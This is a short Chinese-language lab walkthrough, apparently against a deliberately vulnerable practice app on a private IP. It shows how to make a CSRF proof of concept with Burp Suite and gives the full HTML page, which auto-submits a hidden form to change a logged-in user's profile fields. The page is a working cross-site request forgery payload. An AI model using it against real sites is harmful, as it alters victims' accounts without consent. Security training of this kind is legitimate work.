发起请求
拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC
得到以下 html 代码 ,生成poc.html 文件,当用户点击
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.3.224:8082/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="11" />
<input type="hidden" name="phonenum" value="11" />
<input type="hidden" name="add" value="11" />
<input type="hidden" name="email" value="1234" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
打开 poc.html 页面,点击submit request ,即可达成攻击;